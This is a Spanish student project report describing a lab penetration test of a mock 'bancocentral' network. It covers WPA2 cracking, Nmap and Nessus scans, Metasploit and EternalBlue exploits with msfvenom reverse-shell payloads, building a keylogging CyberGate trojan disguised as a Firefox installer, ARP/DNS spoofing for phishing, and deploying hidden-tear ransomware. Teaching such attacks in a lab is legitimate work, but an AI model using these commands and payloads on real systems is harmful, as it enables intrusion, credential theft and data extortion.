Sunteți pe pagina 1din 37

ElliotSnow

Proof Of Concept

ElliotSnow
pg. 1
ElliotSnow

1. Por qu decid hacer este proyecto?


2. Infraestructura de la red
3. Hacking Wifi
4. Tipos de anlisis
4.1.Nmap
4.2.Nessus
5. Explotacin de vulnerabilidades
5.1.Cliente1 WinXP (ms08-067)
5.2.Cliente2 Win7 (ms17-010)
5.3.Cliente 3 Win10 (Phising & Troyano)
5.3.1. Creacin del Troyano
5.4. Server2 WinServ2012 (Ransomware)
5.4.1. Configuracion del ransomware
5.4.2. Xamp_webdav_upload_php
6. Conclusiones
7. Bibliografia

pg. 2
ElliotSnow

1. Por qu decid hacer este proyecto?

Decid hacer este proyecto porque me encanta todo el tema relacionado con el hacking y
la seguridad informtica y me pareci buena idea usar mis conocimientos para realizar mi
proyecto del grado superior de administracin de sistemas informticos en red basado en
este tema. Bajo mi punto de vista no somos conscientes de los peligros que corremos
cuando sin saberlo utilizamos sistemas vulnerables.

En este proyecto podrs ver distintos tipos de anlisis de puertos y vulnerabilidades, la


explotacin de vulnerabilidades en distintos tipos de sistemas Windows entre ellos,
Windows XP, Windows 7, Windows 10, Windows 2008 Server y Windows 2012 Server.

2. Infraestructura de la red

pg. 3
ElliotSnow

Dispositivo 1:
Nombre de la maquina Router
Sistema Operativo Debian
Vulnerabilidad a explotar Airckrack-ng
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 dhcp 255.255.255.0 192.168.1.1
eth1 192.168.100.1 255.255.255.0

Dispositivo 2:
Nombre de la maquina Firewall
Sistema Operativo Debian
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.2 255.255.255.0 192.168.100.1
eth1 192.168.200.1 255.255.255.0

Dispositivo 3:
Nombre de la maquina Cliente1 Winxp
Sistema Operativo Windows XP
Vulnerabilidad a explotar ms08_067
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.5 255.255.255.0 192.168.1.1

Dispositivo 4:
Nombre de la maquina Cliente2 Windows 7
Sistema Operativo Windows 7
Vulnerabilidad a explotar ms17-010
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.3 255.255.255.0 192.168.1.1

Dispositivo 5:
Nombre de la maquina Cliente3 Windows 10
Sistema Operativo Windows 10
Vulnerabilidad a explotar Phising & Troyano
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.4 255.255.255.0 192.168.1.1

Dispositivo 7:
Nombre de la maquina srvbancocentral WinServer 2012
Sistema Operativo Windows Server 2012
Vulnerabilidad a explotar xampp_webdav_upload_php
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.200.5 255.255.255.0 192.168.200.1

pg. 4
ElliotSnow

Dispositivo 8:
Nombre de la maquina Kali Linux
Sistema Operativo Kali Linux
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.88 255.255.255.0 192.168.100.1

Dispositivo 9:
Nombre de la maquina Windows XP (ATACANTE)
Sistema Operativo Windows XP
Configuracin de red
interface Direccin IPV4 Mascara de red Puerta de enlace
eth0 192.168.100.14 255.255.255.0 192.168.100.1

pg. 5
ElliotSnow

3. Hacking Wifi

Con ifconfig veremos cual es nuestra interfaz wifi (wlan0)

Pondremos en modo monitor nuestra interfaz wifi con el comando airmon-ng start wlan0

pg. 6
ElliotSnow

Buscaremos la red con el comando airodump-ng wlan0mon

Como se puede observar tenemos la red con el ESSID BANCOCENTRAL, que es la que
queremos atacar, esta red tiene la MAC (BSSID): C4:6E:1F:67:B9:74, tiene cifrado WPA2 y
utiliza el canal 4.

Ahora capturaremos el trafico de esa red con el comando


airodum-ng -c 4 bssid C4:6E:1F:67:B9:74 -w psk wlan0mon

Ahora tendremos que desautenticar al cliente que se encuentra en la red para ello
utilizaremos el comando
aireplay-ng -0 100 -a C4:6E:1F:67:B9:74 -c 18:F6:A3:A1:EB:C6 wlan0mon

pg. 7
ElliotSnow

Enviaremos paquetes de des autenticacin al cliente para desconectarlo de la red

Una vez terminado usaremos airckrack-ng y un diccionario para descifrar la contrasea


aircrack-ng -w password.lst -b C4:6E:1F:67:B9:74 psk*.cap

pg. 8
ElliotSnow

4. Tipos de anlisis
4.1. Nmap
Qu es Nmap?
Nmap (mapeador de redes) es una herramienta de cdigo abierto para exploracin
de red y auditora de seguridad.

Se dise para analizar rpidamente grandes redes, aunque funciona muy bien contra
equipos individuales. Para determinar qu equipos se encuentran disponibles en una
red, qu servicios (nombre y versin de la aplicacin) ofrecen, qu sistemas
operativos (y sus versiones) ejecutan, qu tipo de filtros de paquetes o cortafuegos se
estn utilizando as como docenas de otras caractersticas.

nmap -A -T4 -sV -oA Bancocentral 192.168.100.0/24

# Nmap 7.40 scan initiated Sun May 21 17:59:59 2017 as: nmap -A -T4 -sV -oA
Bancocentral 192.168.100.0/24

Nmap scan report for 192.168.100.1


Host is up (0.00064s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain
1 | dns-nsid:
|_ bind.version: 9.9.5-9+deb8u10-Debian
80/tcp open http Apache httpd 2.4.10 ((Debian))
2 |_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:DA:19:06 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.63 ms 192.168.100.1

-Conclusin:
1. Podemos identificar que este equipo tiene un servicio de dns con bind9
53/tcp open domain
| dns-nsid:
|_ bind.version: 9.9.5-9+deb8u10-Debian
2. Que tiene un servidor web apache 2.4.10:
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works

Nmap scan report for 192.168.100.2


Host is up (0.00068s latency).
pg. 9
ElliotSnow

All 1000 scanned ports on 192.168.100.2 are closed


MAC Address: 00:0C:29:DE:E6:26 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.100.2

-Conclusin:
Solo identificamos un host activo en la red con la ip 192.168.100.2

Nmap scan report for 192.168.100.3


Host is up (0.00086s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
1 49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:71:28:EC (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1
cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2
cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
2
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2,
Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


|_clock-skew: mean: -5s, deviation: 0s, median: -5s
|_nbstat: NetBIOS name: CLIENTE-WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:71:28:ec
(VMware)
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: cliente-win7
| NetBIOS computer name:
| Domain name: bancocentral.com
| Forest name: bancocentral.com
| FQDN: cliente-win7.bancocentral.com
3 |_ System time: 2017-05-21T18:01:23+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.86 ms 192.168.100.3

pg. 10
ElliotSnow

-Conclusin:
1. Puertos abiertos
135 (msrcp), 139 (netbios), 445 (microsoft-ds), 5357, 49152-49157 (msrcp)

2. Fingerprinting Sistema Operativo


Windows 7 SP1

3. smb-os-discovery
Smb v2

Nmap scan report for 192.168.100.4


Host is up (0.00072s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
1 445/tcp open microsoft-ds Windows 10 Pro 15063 microsoft-ds
MAC Address: 00:0C:29:15:A8:2E (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.40%E=4%D=5/21%OT=135%CT=1%CU=41172%PV=Y%DS=1%DC=D%G=Y%M=000C29%
OS:TM=5921BA50%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10F%TI=I%CI=I%II=
OS:I%SS=S%TS=A)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8
OS:ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=F
OS:FFF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=
OS:80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3
OS:(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%
OS:F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y
OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)I
OS:E(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop


2 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


|_clock-skew: mean: -3s, deviation: 0s, median: -3s
|_nbstat: NetBIOS name: CLIENTE3-WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:15:a8:2e
(VMware)
| smb-os-discovery:
| OS: Windows 10 Pro 15063 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| NetBIOS computer name:
| Workgroup: SRVBANCOCENTRAL\xE5\x89\x93CLIENTE3-WIN10\x00
3 |_ System time: 2017-05-21T18:01:25+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms 192.168.100.4
-Conclusin:
1.Puertos abiertos
135 (msrcp), 139 (netbios), 445 (microsoft-ds)

pg. 11
ElliotSnow

2.fingerprinting Sistema Operativo


Windows 2010

3.smb-os-discovery
smb v2

Nmap scan report for 192.168.100.5


Host is up (0.0041s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
1
3389/tcp open ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:9A:14:05 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003::-
2 OS details: Microsoft Windows XP SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:


|_clock-skew: mean: -19h07m15s, deviation: 0s, median: -19h07m15s
|_nbstat: NetBIOS name: CLIENTE-WINXP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:9a:14:05
(VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: cliente-winxp
| NetBIOS computer name:
| Domain name: bancocentral.com
| FQDN: cliente-winxp.bancocentral.com
3 |_ System time: 2017-05-20T15:54:13-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 4.14 ms 192.168.100.5

-Conclusin:
1. Puertos abiertos
139 (netbios), 445 (micfosoft-ds), 3389 (ms-wbt-server)

2. Fingerprinting Sistema Operativo


Windows XP SP2

4. smb-os-discovery
smb v2

pg. 12
ElliotSnow

4.2. Nessus
Qu es Nessus?
Es un escner de redes que detecta posibles vulnerabilidades en las mquinas de una
red (basndose en la lista de fallas conocidas). Se utiliza para comprobar la seguridad
y encontrar vulnerabilidades para que puedan ser solucionadas por el administrador
del sistema.

Iniciamos nessus en el navegador en la direccin 127.0.0.1:8834

Pulsamos el botn de New Scan para hacer un nuevo escaneo.

pg. 13
ElliotSnow

Nos mostrara una ventana de configuracin en la que pondremos el nombre del


proyecto y los host que vamos a analizar.

Una vez termine el escaneo, podremos ver unos grficos de los distintos host que
hemos analizado y el tipo de vulnerabilidades que ha detectado, nos centraremos en
las crticas de los host 192.168.100.5 y 192.168.100.3

pg. 14
ElliotSnow

Hacemos clic sobre el host 192.168.100.5 y podremos ver informacin sobre


vulnerabilidades que tiene.

Nos centraremos en la MS08-067

Se trata de una vulnerabilidad para la ejecucin remota de cdigo. Un atacante que


aprovechara esta vulnerabilidad podra tomar el control completo de un sistema
afectado de forma remota, un atacante podra aprovechar esta vulnerabilidad sobre
RPC sin autenticacin y ejecutar cdigo arbitrario.

La causa de esta vulnerabilidad es el servicio del servidor, que no controla


correctamente las solicitudes de RPC especialmente elaboradas para ello.

pg. 15
ElliotSnow

Despus hacemos clic sobre el host 192.168.100.3 y podremos ver informacin sobre
vulnerabilidades que tiene

Nos centraremos en la MS17-010

La vulnerabilidad nos permite la ejecucin remota de cdigo enviando mensajes


especialmente diseados a un servidor de Microsoft Server Message Block 1.0
(SMBv1).

pg. 16
ElliotSnow

5. Explotacin de vulnerabilidades

5.1. Cliente1 WinXP (ms08-67)

Con el comando ping comprobamos que tenemos conexin con el host.

Qu es Metasploit?
Metasploit es Framework. Que est diseado para explotar las vulnerabilidades de
los equipos. Dentro de Metasploit, disponemos de multitud de exploits para ejecutar
en las diferentes vulnerabilidades en las maquinas remotas.

Ejecutamos metasploit con el comando msfconsole

pg. 17
ElliotSnow

Buscamos en la base de datos de metasploit la vulnerabilidad que vamos a atacar con


el comando
search ms08_067

Una vez conozcamos la ruta del exploit lo utilizaremos con el comando


use exploit/windows/ms08_067_netapi
Para ver las opciones del exploit usaremos el comando
Show options

Cambiamos la IP del equipo Victima


set RHOST 192.168.100.5
Seleccionamos el payload
set PAYLOAD Windows/meterpreter/reverse_tcp
Cambiamos la IP del equipo Atacante
set LHOST 192.168.100.88

Ejecutamos el ataque con el comando exploit


pg. 18
ElliotSnow

Una vez terminado de lanzarse el ataque tendremos el control del equipo victima

5.2. Cliente2 Win7 (ms17-010)


Qu es FunzzBunch?
pg. 19
ElliotSnow

Es el metasploit de la NSA, fue liberado por un grupo de hackers llamados


shadowbroker, entre los exploit que podremos encontrar dentro de el se encuentra
eternalblue, el cual nos permite conseguir acceso a un equipo windows 7.

Ejecutamos Funzzbunch con el comando python fb.py

Seleccionamos las siguientes opciones

Default Target IP Address: Equipo vctima (Windows 7)


Default Callback IP Address: Equipo atacante (Windows XP)

Creamos un nuevo proyecto para este ataque lo llamaremos Windows7Bancocentral

pg. 20
ElliotSnow

Una vez haya cargado Funzzbunch para utilizar Eternalblue escribiremos el comando
use EternalBlue

pg. 21
ElliotSnow

Dejaremos todas las opciones por defecto menos

Mode, que seleccionaremos la opcin 1

pg. 22
ElliotSnow

Despus nos mostrara informacin sobre la vctima y nos preguntara si queremos


realizar el ataque.

Si todo sali bien nos mostrara la siguiente pantalla.

Ahora nos iremos a nuestra maquina KaliLinux y crearemos una DLL maliciosa con
msfvenom
msfvenom -a x64 -p windows/meterpreter/meterpreter_reverse_tcp
LHOST=192.168.100.88 LPORT=4444 -f dll > meter.dll

pg. 23
ElliotSnow

Copiamos la DLL creada a la maquina Windows XP y ejecutamos Doublepulsar

Seleccionamos que ataque al protocolo SMB


Seleccionamos que utilice la arquitectura de x64
Seleccionamos la funcin RunDLL

pg. 24
ElliotSnow

Seleccionaremos la ruta donde guardamos la DLL maliciosa

Nos pedir que si ejecuta el Plugin y si todo sale bien nos mostrara
Doublepulsar Succeded

pg. 25
ElliotSnow

Una vez inyectada la DLL nos vamos nuevamente a nuestra maquina KaliLinux
Ejecutaremos metasploit con msfconsole
Seleccionaremos el exploit exploit/multi/handler
Cambiamos LHOST por nuestra IP
Cambiamos LPORT por el puerto que pusimos antes
Y ejecutamos el exploit con el comando exploit

5.3. Cliente 3 Win10 (Phising & Troyano)


5.3.1. Creacin del troyano
Qu es un troyano?
Es un software malicioso que se presenta al usuario como un programa
aparentemente legtimo e inofensivo, pero que, al ejecutarlo, le brinda a un atacante
acceso remoto al equipo infectado.

pg. 26
ElliotSnow

Para esta prueba utilizare CyberGate, primero tenemos que configurar el servidor del
troyano el cual se ejecutara en el equipo vctima, abrimos control center, builder y
seleccionamos create server

Creamos un nuevo perfil y hacemos clic en Forward

pg. 27
ElliotSnow

Aadimos la direccin del equipo atacante

Seleccionamos que se instale en el directorio Windows

En esta opcin hacemos que muestre un mensaje cuando se ejecute el servidor en el


equipo victima

pg. 28
ElliotSnow

Aadimos un keyloger, para capturar contraseas de la victima

Desmarcamos todas las opciones para que no se cancele la ejecucin del servidor

pg. 29
ElliotSnow

Seleccionamos la opcin Bind files, la cual me permitir adjuntar un


archivo/programa al servidor el cual se ejecute cuando nuestro servidor se ejecute
para que la vctima no sospeche

Seleccionamos el ejecutable de instalacin de firefox

pg. 30
ElliotSnow

Con el icono hemos lo mismo, hacemos clic sobre l y busco uno que ser el que se le
muestre e la vctima, hacemos clic en Create Server y seleccionamos la ruta donde lo
deseamos guardar.

pg. 31
ElliotSnow

5.3.2. Phishing

Qu es el phishing?
Consiste en engaar a la vctima mediante un ataque hacindonos pasar por alguien de
confianza, con esto engaaremos a la vctima para que se descargue un software
malicioso.

Primero tenemos que envenenar las tablas arp, para ello utilizaremos arpspoof
arpspoof -i [interface] -t [victima] [router]

pg. 32
ElliotSnow

Despus crearemos un archivo host para re direccionar a la vctima a una web


maliciosa desde la que descargara el troyano

Utilizaremos dnsspoof -i eth0 -f spoofhost para engaar a la victima

pg. 33
ElliotSnow

Cuando la vctima entre en la web de bancocentral.com le pedir que debe actualizar


el navegador, esta descargara nuestro troyano el cual al ejecutarlo nos dar conexin
en cybergate

Una vez ejecutado en la victima en cybergate mostrara la conexin activa

pg. 34
ElliotSnow

Nos permite realizar muchas de acciones, explorador de archivos, escritorio remoto,


ver procesos, programas instalados

5.4 Server2 WinServ2012 (xampp_webdav_upload_php & Ransomware)


5.4.1 Configuracion del Ransomware

Qu es un Ransomware?

Un ransomware es un tipo de programa informtico malintencionado que restringe


el acceso a determinadas partes o archivos del sistema infectado, y pide un rescate a
cambio de quitar esta restriccin.

Configuramos en ransomware hidden-tear


Seleccionaremos el nombre y extensin del archivo que ejecutara el ransomware

Crearemos una contrasea al azar

Aqu podemos aadir extensiones que queramos que se cifren

pg. 35
ElliotSnow

Configuramos el tipo de encriptacin que tendr nuestro ransomware

Seleccionaremos una ruta donde se creara un documento txt con informacin para
que la victima pueda recuperar sus archivos.

Configuramos donde ser el directorio en el que empiece a cifrar nuestro


ransomware

Despus compilaremos el programa

5.4.2 xampp_webdav_upload_php

pg. 36
ElliotSnow

Utilizaremos el exploit xampp_webdav_upload_php, ya que el servidor tiene una


versin de xampp vulnerable y nos permitir atacarlo

Una vez nos conectemos a la vctima, subiremos el ransomware que lo tendremos


guardado en nuestra mquina, lo ejecutaremos y como se puede ver los archivos del
escritorio se cifraran.

6. Conclusiones
Como hemos podido observar somos mas vulnerables de lo que pensamos, no es dificil
que alguien penetre en nuestro sistema

7. Bibliografia
https://www.aircrack-ng.org/
https://nmap.org/
https://www.tenable.com/products/nessus-vulnerability-scanner
https://www.kali.org/
https://www.metasploit.com/
https://github.com/misterch0c/shadowbroker
https://github.com/goliate/hidden-tear

pg. 37

S-ar putea să vă placă și